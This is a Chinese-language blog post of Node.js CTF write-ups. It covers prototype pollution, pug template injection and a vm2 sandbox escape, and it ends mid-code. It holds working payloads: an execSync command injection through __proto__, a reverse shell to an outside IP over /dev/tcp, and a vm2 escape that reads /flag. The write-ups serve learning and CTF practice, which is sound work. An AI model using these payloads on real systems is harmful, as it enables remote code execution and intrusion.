<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/flash.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/flash.ico">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-corner-indicator.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"www.ch4ser.top","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="不会javascript, 在看smi1e师傅关于原型链污染攻击的博客时候, 这张图片让我思考了很久">
<meta property="og:type" content="article">
<meta property="og:title" content="nodejs相关">
<meta property="og:url" content="http://www.ch4ser.top/2019/11/17/javascript-learn/index.html">
<meta property="og:site_name" content="ch4ser||自闭室">
<meta property="og:description" content="不会javascript, 在看smi1e师傅关于原型链污染攻击的博客时候, 这张图片让我思考了很久">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://user-images.githubusercontent.com/40637063/69004994-4e141d80-0956-11ea-8a97-a946b681ac75.png">
<meta property="og:image" content="https://user-images.githubusercontent.com/40637063/69007214-fc7b8b00-0975-11ea-9f53-bf96932750ea.png">
<meta property="og:image" content="http://www.ch4ser.top/images/image-20200223184607314.png">
<meta property="og:image" content="http://www.ch4ser.top/images/image-20200123220813194.png">
<meta property="og:image" content="http://www.ch4ser.top/images/image-20200123220954191.png">
<meta property="og:image" content="http://www.ch4ser.top/images/image-20200123221147765.png">
<meta property="og:image" content="http://www.ch4ser.top/images/image-20200123224339539.png">
<meta property="og:image" content="http://www.ch4ser.top/images/image-20200123224551590.png">
<meta property="og:image" content="http://www.ch4ser.top/images/image-20200123233543747.png">
<meta property="og:image" content="http://www.ch4ser.top/images/image-20200123235223013.png">
<meta property="og:image" content="http://www.ch4ser.top/images/image-20200123235208032.png">
<meta property="og:image" content="http://www.ch4ser.top/images/image-20200123235558341.png">
<meta property="og:image" content="http://www.ch4ser.top/images/image-20200123233034091.png">
<meta property="og:image" content="http://www.ch4ser.top/images/image-20200420112457355.png">
<meta property="og:image" content="http://www.ch4ser.top/images/image-20200420114138186.png">
<meta property="og:image" content="http://www.ch4ser.top/images/image-20200420114321997.png">
<meta property="article:published_time" content="2019-11-17T08:15:38.000Z">
<meta property="article:modified_time" content="2021-10-16T06:15:26.604Z">
<meta property="article:author" content="ch4ser">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://user-images.githubusercontent.com/40637063/69004994-4e141d80-0956-11ea-8a97-a946b681ac75.png">

<link rel="canonical" href="http://www.ch4ser.top/2019/11/17/javascript-learn/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>nodejs相关 | ch4ser||自闭室</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="ch4ser||自闭室" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">ch4ser||自闭室</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">(´・ω・｀)你瞅啥呢</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="http://www.ch4ser.top/2019/11/17/javascript-learn/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/sabito.jpg">
      <meta itemprop="name" content="ch4ser">
      <meta itemprop="description" content="向阳十八载，回首也无晴">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="ch4ser||自闭室">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          nodejs相关
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2019-11-17 16:15:38" itemprop="dateCreated datePublished" datetime="2019-11-17T16:15:38+08:00">2019-11-17</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2021-10-16 14:15:26" itemprop="dateModified" datetime="2021-10-16T14:15:26+08:00">2021-10-16</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E5%AE%89%E5%85%A8%E7%A0%94%E7%A9%B6/" itemprop="url" rel="index"><span itemprop="name">安全研究</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>不会javascript, 在看smi1e师傅关于原型链污染攻击的博客时候, 这张图片让我思考了很久</p>
<span id="more"></span>

<p><img src="https://user-images.githubusercontent.com/40637063/69004994-4e141d80-0956-11ea-8a97-a946b681ac75.png" alt="image"></p>
<p>很勉强的自己给自己找到一个比喻: cat.prototype是一个对象, 比作仓库, 仓库里面有按照一定顺序摆放的货物, constructor是在这些货物的基础上做的修改, 比如增加什么东西减去什么东西改变什么东西的顺序之类的. 没有constructor, 仓库就是静态的一个仓库, 也就是对象, 但是如果将constructor实施的话, 就是产生一个拥有新货物的仓库, 也就是cat实例对象, 那么类又是什么概念? 就像是给仓库定下一个整理计划, 这个计划叫做constructor, 而这个计划还没有实施, 你说他是静态的仓库(对象)似乎不妥, 因为有计划的存在, 这个仓库是可变的, 这个状态可以变化的仓库就叫做类.</p>
<p>当然这种比喻很牵强, 我也不知道合不合理, 也只是为了更好理解原型链污染而做的臆想… </p>
<p>然后对于p师傅博客中写道关于字典赋值proto无效的问题,实验了一下:</p>
<p><img src="https://user-images.githubusercontent.com/40637063/69007214-fc7b8b00-0975-11ea-9f53-bf96932750ea.png" alt="image"></p>
<p>字典在创立的时候应该是先创立字典内的项然后将他们聚合起来, 那么在创立a的时候先创立的是a的原型, 然后再创立的a, 这也就解释了为什么bar传不到Object中去,而是传入了Object的下一级, 也就是a的原型.</p>
<h2 id="NPUCTF-2020-验证🐎"><a href="#NPUCTF-2020-验证🐎" class="headerlink" title="NPUCTF 2020 验证🐎"></a>NPUCTF 2020 验证🐎</h2><p>参考</p>
<p><a target="_blank" rel="noopener" href="https://www.plasf.cn/2020/04/25/Node%E4%B8%93%E9%A2%98%E8%AE%AD%E7%BB%83-1/">https://www.plasf.cn/2020/04/25/Node%E4%B8%93%E9%A2%98%E8%AE%AD%E7%BB%83-1/</a></p>
<h2 id="春秋战疫赛-Ez-express"><a href="#春秋战疫赛-Ez-express" class="headerlink" title="春秋战疫赛 Ez_express"></a>春秋战疫赛 Ez_express</h2><p>源代码如下</p>
<p>index.js</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> express = <span class="built_in">require</span>(<span class="string">&#x27;express&#x27;</span>);</span><br><span class="line"><span class="keyword">var</span> router = express.Router();</span><br><span class="line"><span class="keyword">const</span> isObject = <span class="function"><span class="params">obj</span> =&gt;</span> obj &amp;&amp; obj.constructor &amp;&amp; obj.constructor === <span class="built_in">Object</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 这个merge可以造成原型链污染</span></span><br><span class="line"><span class="keyword">const</span> merge = <span class="function">(<span class="params">a, b</span>) =&gt;</span> &#123;</span><br><span class="line">  <span class="keyword">for</span> (<span class="keyword">var</span> attr <span class="keyword">in</span> b) &#123;</span><br><span class="line">    <span class="keyword">if</span> (isObject(a[attr]) &amp;&amp; isObject(b[attr])) &#123;</span><br><span class="line">      merge(a[attr], b[attr]);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">      a[attr] = b[attr];</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> a</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// clone和merge效果一样</span></span><br><span class="line"><span class="keyword">const</span> clone = <span class="function">(<span class="params">a</span>) =&gt;</span> &#123;</span><br><span class="line">  <span class="keyword">return</span> merge(&#123;&#125;, a);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">safeKeyword</span>(<span class="params">keyword</span>) </span>&#123;</span><br><span class="line">  <span class="keyword">if</span>(keyword.match(<span class="regexp">/(admin)/i</span>s)) &#123;</span><br><span class="line">      <span class="keyword">return</span> keyword</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">return</span> <span class="literal">undefined</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">router.get(<span class="string">&#x27;/&#x27;</span>, <span class="function"><span class="keyword">function</span> (<span class="params">req, res</span>) </span>&#123;</span><br><span class="line">  <span class="keyword">if</span>(!req.session.user)&#123;</span><br><span class="line">    res.redirect(<span class="string">&#x27;/login&#x27;</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  res.outputFunctionName=<span class="literal">undefined</span>;</span><br><span class="line">  res.render(<span class="string">&#x27;index&#x27;</span>,data=&#123;<span class="string">&#x27;user&#x27;</span>:req.session.user.user&#125;);</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">router.get(<span class="string">&#x27;/login&#x27;</span>, <span class="function"><span class="keyword">function</span> (<span class="params">req, res</span>) </span>&#123;</span><br><span class="line">  res.render(<span class="string">&#x27;login&#x27;</span>);</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">router.post(<span class="string">&#x27;/login&#x27;</span>, <span class="function"><span class="keyword">function</span> (<span class="params">req, res</span>) </span>&#123;</span><br><span class="line">  <span class="keyword">if</span>(req.body.Submit==<span class="string">&quot;register&quot;</span>)&#123;</span><br><span class="line">      <span class="comment">// 这里safekeyword就是不让通过ADMIN进行注册</span></span><br><span class="line">   <span class="keyword">if</span>(safeKeyword(req.body.userid))&#123;</span><br><span class="line">    res.end(<span class="string">&quot;&lt;script&gt;alert(&#x27;forbid word&#x27;);history.go(-1);&lt;/script&gt;&quot;</span>) </span><br><span class="line">   &#125;</span><br><span class="line">    req.session.user=&#123;</span><br><span class="line">        <span class="comment">// toUpperCase()除了正常的大小写转化之外会将一些特殊字符进行一个转化</span></span><br><span class="line">      <span class="string">&#x27;user&#x27;</span>:req.body.userid.toUpperCase(),</span><br><span class="line">      <span class="string">&#x27;passwd&#x27;</span>: req.body.pwd,</span><br><span class="line">      <span class="string">&#x27;isLogin&#x27;</span>:<span class="literal">false</span></span><br><span class="line">    &#125;</span><br><span class="line">    res.redirect(<span class="string">&#x27;/&#x27;</span>); </span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span> <span class="keyword">if</span>(req.body.Submit==<span class="string">&quot;login&quot;</span>)&#123;</span><br><span class="line">    <span class="keyword">if</span>(!req.session.user)&#123;res.end(<span class="string">&quot;&lt;script&gt;alert(&#x27;register first&#x27;);history.go(-1);&lt;/script&gt;&quot;</span>)&#125;</span><br><span class="line">    <span class="keyword">if</span>(req.session.user.user==req.body.userid&amp;&amp;req.body.pwd==req.session.user.passwd)&#123;</span><br><span class="line">      req.session.user.isLogin=<span class="literal">true</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span>&#123;</span><br><span class="line">      res.end(<span class="string">&quot;&lt;script&gt;alert(&#x27;error passwd&#x27;);history.go(-1);&lt;/script&gt;&quot;</span>)</span><br><span class="line">    &#125;</span><br><span class="line">  </span><br><span class="line">  &#125;</span><br><span class="line">  res.redirect(<span class="string">&#x27;/&#x27;</span>); ;</span><br><span class="line">&#125;);</span><br><span class="line">router.post(<span class="string">&#x27;/action&#x27;</span>, <span class="function"><span class="keyword">function</span> (<span class="params">req, res</span>) </span>&#123;</span><br><span class="line">  <span class="keyword">if</span>(req.session.user.user!=<span class="string">&quot;ADMIN&quot;</span>)&#123;res.end(<span class="string">&quot;&lt;script&gt;alert(&#x27;ADMIN is asked&#x27;);history.go(-1);&lt;/script&gt;&quot;</span>)&#125;</span><br><span class="line">    <span class="comment">// 这里有触发原型链污染的机会</span></span><br><span class="line">  req.session.user.data = clone(req.body);</span><br><span class="line">  res.end(<span class="string">&quot;&lt;script&gt;alert(&#x27;success&#x27;);history.go(-1);&lt;/script&gt;&quot;</span>);  </span><br><span class="line">&#125;);</span><br><span class="line">router.get(<span class="string">&#x27;/info&#x27;</span>, <span class="function"><span class="keyword">function</span> (<span class="params">req, res</span>) </span>&#123;</span><br><span class="line">  res.render(<span class="string">&#x27;index&#x27;</span>,data=&#123;<span class="string">&#x27;user&#x27;</span>:res.outputFunctionName&#125;);</span><br><span class="line">&#125;)</span><br><span class="line"><span class="built_in">module</span>.exports = router;</span><br></pre></td></tr></table></figure>

<p>要触发原型链污染有个前提条件:  登录admin, 看源码的意思就是首先需要注册一个ADMIN, 但是<code>safekeyword</code>函数将这个操作限制住了, 然而<code>toUpperCase</code>有字符转化的特点, 参考</p>
<p><a target="_blank" rel="noopener" href="https://www.leavesongs.com/HTML/javascript-up-low-ercase-tip.html">https://www.leavesongs.com/HTML/javascript-up-low-ercase-tip.html</a></p>
<p>因此使用<code>admın </code>和随意的密码去注册一个用户, 就可以登录admin了, 登录admin之后通过action发送如下数据包</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&quot;__proto__&quot;:&#123;&quot;outputFunctionName&quot;:&quot;_tmp1;return global.process.mainModule.constructor._load(&#x27;child_process&#x27;).execSync(&#x27;ls&#x27;);//&quot;&#125;&#125;</span><br></pre></td></tr></table></figure>



<p>发送完之后访问一下/info就拿到了flag</p>
<p><img src="/images/image-20200223184607314.png" alt="image-20200223184607314"></p>
<p><a target="_blank" rel="noopener" href="https://medium.com/bugbountywriteup/nodejs-ssrf-by-response-splitting-asis-ctf-finals-2018-proxy-proxy-question-walkthrough-9a2424923501">https://medium.com/bugbountywriteup/nodejs-ssrf-by-response-splitting-asis-ctf-finals-2018-proxy-proxy-question-walkthrough-9a2424923501</a></p>
<p>[<a target="_blank" rel="noopener" href="https://github.com/xiaobye-ctf/CTF-writeups/blob/master/hackim-2020/web/split%20second/split%20second.md?tdsourcetag=s_pctim_aiomsg%5D">https://github.com/xiaobye-ctf/CTF-writeups/blob/master/hackim-2020/web/split%20second/split%20second.md?tdsourcetag=s_pctim_aiomsg]</a>(<a target="_blank" rel="noopener" href="https://github.com/xiaobye-ctf/CTF-writeups/blob/master/hackim-2020/web/split">https://github.com/xiaobye-ctf/CTF-writeups/blob/master/hackim-2020/web/split</a> second/split second.md?tdsourcetag=s_pctim_aiomsg)</p>
<h2 id="2019-XNUCA-hardjs-复现"><a href="#2019-XNUCA-hardjs-复现" class="headerlink" title="2019 XNUCA hardjs 复现"></a>2019 XNUCA hardjs 复现</h2><p>页面功能: 注册 登录 发表评论</p>
<p>拿到源代码之后首先使用命令<code>npm audit</code>来自动检测一下是否有存在漏洞的依赖包</p>
<p><img src="/images/image-20200123220813194.png" alt="image-20200123220813194"></p>
<p>一个原型链污染漏洞, 好的. 看下<code>lodash</code>是干啥的</p>
<p><img src="/images/image-20200123220954191.png" alt="image-20200123220954191"></p>
<p>查看源代码部分看看在哪里用到了这个<code>lodash</code></p>
<p><img src="/images/image-20200123221147765.png" alt="image-20200123221147765"></p>
<p>大意是访问<code>/get</code>路由就会从根据userid从数据库中查询出消息, 判断条数, 如果大于5条的话, 就会对每一条都进行一个<code>lodash.defaultsDeep</code>函数处理, 查查看payload</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> mergeFn = <span class="built_in">require</span>(<span class="string">&#x27;lodash&#x27;</span>).defaultsDeep;</span><br><span class="line"><span class="keyword">const</span> payload = <span class="string">&#x27;&#123;&quot;constructor&quot;: &#123;&quot;prototype&quot;: &#123;&quot;a0&quot;: true&#125;&#125;&#125;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">check</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">    mergeFn(&#123;&#125;, <span class="built_in">JSON</span>.parse(payload));</span><br><span class="line">    <span class="keyword">if</span> ((&#123;&#125;)[<span class="string">`a0`</span>] === <span class="literal">true</span>) &#123;</span><br><span class="line">        <span class="built_in">console</span>.log(<span class="string">`Vulnerable to Prototype Pollution via <span class="subst">$&#123;payload&#125;</span>`</span>);</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">check();</span><br></pre></td></tr></table></figure>

<p>那么构造一个类似的应该就可以污染任意参数了.</p>
<p>然后思路是想通过xss让对面的bot将作为flag的password发送出来, 但是和传统的发送url链接让对面bot查看的方式不一样, 我们没有这么个玩意. 那么想要xss怎么办? 只能伪造登录进bot的账号, 再在bot的消息列表中插入xss代码, 等对面查看的时候就可以触发了, 那么怎么伪造登录呢?</p>
<p>查看一下登录验证的代码</p>
<p><img src="/images/image-20200123224339539.png" alt="image-20200123224339539"></p>
<p>好, 那么可以考虑一下把<code>login</code>还有<code>userid</code>这俩都给污染成true</p>
<p><img src="/images/image-20200123224551590.png" alt="image-20200123224551590"></p>
<p>多发几次然后路由访问<code>/get</code>去触发一下, 把cookie都删掉重新访问后就会发现成功以userid=1的身份登录了.</p>
<p>登录完之后就要考虑怎么在页面中插入xss代码了</p>
<p>在app.js中有这么一段</p>
<p><img src="/images/image-20200123233543747.png" alt="image-20200123233543747"></p>
<p>这个<code>$.extend</code>相当于合并数组, 这种操作也可以造成原型链污染,<code>CVE-2019-11358</code> 再来看页面渲染的部分</p>
<p><img src="/images/image-20200123235223013.png" alt="image-20200123235223013"></p>
<p>会把符合条件的hints标签都拿出来渲染一遍, 在这个过程中会将沙盒作用在这些标签上</p>
<p><img src="/images/image-20200123235208032.png" alt="image-20200123235208032"></p>
<p>也就是为什么在如图地方直接写xss代码会无效的原因</p>
<p><img src="/images/image-20200123235558341.png" alt="image-20200123235558341"></p>
<p>观察渲染模板<code>index.ejs</code>, 发现有一个标签<code>logger</code>不在沙盒限制中并且符合条件, 那么, 可以污染hints让他的原型中包含logger从而让hints在遍历的过程中遍历到logger然后去渲染他, logger里的内容自然是post表单了.</p>
<p><img src="/images/image-20200123233034091.png" alt="image-20200123233034091"></p>
<p>还有一种解法, 等我会调试js了就去补</p>
<h3 id="jade-pug-模板注入"><a href="#jade-pug-模板注入" class="headerlink" title="jade pug 模板注入"></a>jade pug 模板注入</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">const pug=require(&#x27;pug&#x27;);</span><br><span class="line"></span><br><span class="line">pug.render(&#x27;#&#123;console.log(&quot;1&quot;)&#125;&#x27;);</span><br><span class="line">pug.render(&#x27;-console.log(1)&#x27;);</span><br></pre></td></tr></table></figure>

<p>renderfile也可以模板注入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">cmd = &#x27;bash -i &gt;&amp; /dev/tcp/192.168.220.157/8888 0&gt;&amp;1&#x27;</span><br><span class="line"></span><br><span class="line">payload = &quot;process.binding(&#x27;spawn_sync&#x27;).spawn(&#123;file:&#x27;bash&#x27;,args:[&#x27;/bin/bash&#x27;,&#x27;-c&#x27;,&#x27;%s&#x27;],envPairs:[&#x27;y=&#x27;],stdio:[&#123;type:&#x27;pipe&#x27;,readable:1&#125;]&#125;)&quot; % cmd</span><br><span class="line"></span><br><span class="line">pug = (&#x27;&#x27;&#x27;-[][&quot;constructor&quot;][&quot;constructor&quot;](&quot;&#123;&#125;&quot;)()&#x27;&#x27;&#x27;.format(payload)).replace(&#x27;&quot;&#x27;,&#x27;%22&#x27;).replace(&quot;&#x27;&quot;,&quot;%27&quot;)</span><br><span class="line"># pug = (&#x27;&#x27;&#x27;#&#123;[][&quot;constructor&quot;][&quot;constructor&quot;](&quot;%s&quot;)()&#125;&#x27;&#x27;&#x27;%(payload)).replace(&#x27;&quot;&#x27;,&#x27;%22&#x27;).replace(&quot;&#x27;&quot;,&quot;%27&quot;)</span><br><span class="line">print quote(pug)</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/rIXIfhw3vcM9PVJI6HTq2g">https://mp.weixin.qq.com/s/rIXIfhw3vcM9PVJI6HTq2g</a></p>
<h2 id="虎符杯-2020-JustEscape"><a href="#虎符杯-2020-JustEscape" class="headerlink" title="虎符杯 2020 JustEscape"></a>虎符杯 2020 JustEscape</h2><p>由这个题目而来</p>
<p><a target="_blank" rel="noopener" href="https://blog.zeddyu.info/2019/02/14/Hackim-2019/#BabyJS">https://blog.zeddyu.info/2019/02/14/Hackim-2019/#BabyJS</a></p>
<p>可以通过以下形式来进行计算</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://8959c4a3-f43e-45ff-a5e0-7753dd5556d6.node3.buuoj.cn/run.php?code=1-1</span><br></pre></td></tr></table></figure>

<p>但是</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://8959c4a3-f43e-45ff-a5e0-7753dd5556d6.node3.buuoj.cn/run.php?code=1%2b1</span><br></pre></td></tr></table></figure>

<p>会得到</p>
<p><img src="/images/image-20200420112457355.png" alt="image-20200420112457355"></p>
<p>从后来的表现来看, 是被过滤了.</p>
<p><img src="/images/image-20200420114138186.png" alt="image-20200420114138186"></p>
<p>看题目的提示,可能后端不是php, 看到插件wappalyzer显示</p>
<p><img src="/images/image-20200420114321997.png" alt="image-20200420114321997"></p>
<p>而且, <code>Date()</code>函数 在javascript中可以用, 不带参数. php中没有.所以可以判断后端其实是nodejs写的.</p>
<p>用<code>Error().stack</code>来获取可以使用的模块信息.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Error at vm.js:1:1 at Script.runInContext (vm.js:131:20) at VM.run (/app/node_modules/vm2/lib/main.js:219:62) at /app/server.js:51:33 at Layer.handle [as handle_request] (/app/node_modules/express/lib/router/layer.js:95:5) at next (/app/node_modules/express/lib/router/route.js:137:13) at Route.dispatch (/app/node_modules/express/lib/router/route.js:112:3) at Layer.handle [as handle_request] (/app/node_modules/express/lib/router/layer.js:95:5) at /app/node_modules/express/lib/router/index.js:281:22 at Function.process_params (/app/node_modules/express/lib/router/index.js:335:12)</span><br></pre></td></tr></table></figure>

<p>使用payload, 从<a target="_blank" rel="noopener" href="https://github.com/patriksimek/vm2/issues/225">https://github.com/patriksimek/vm2/issues/225</a> 找到的最新的.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code[]=try&#123;Buffer.from(new Proxy(&#123;&#125;, &#123;getOwnPropertyDescriptor()&#123;throw f=&gt;f.constructor(&quot;return process&quot;)();&#125;&#125;));&#125;catch(e)&#123;e(()=&gt;&#123;&#125;).mainModule.require(&quot;child_process&quot;).execSync(&quot;cat /flag&quot;).toString();&#125;</span><br></pre></td></tr></table></figure>



<p>原题的payload在这里打不了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">var process;</span><br><span class="line">try&#123;</span><br><span class="line">Object.defineProperty(Buffer.from(&quot;&quot;),&quot;&quot;,&#123;</span><br><span class="line">value:new Proxy(&#123;&#125;,&#123;</span><br><span class="line">getPrototypeOf(target)&#123;</span><br><span class="line">if(this.t)</span><br><span class="line">throw Buffer.from;</span><br><span class="line">this.t=true;</span><br><span class="line">Object.getPrototypeOf(target);</span><br><span class="line">&#125;</span><br><span class="line">&#125;)</span><br><span class="line">&#125;);</span><br><span class="line">&#125;catch(e)&#123;</span><br><span class="line">trueprocess = e.constructor(&quot;return process&quot;)();</span><br><span class="line">&#125;</span><br><span 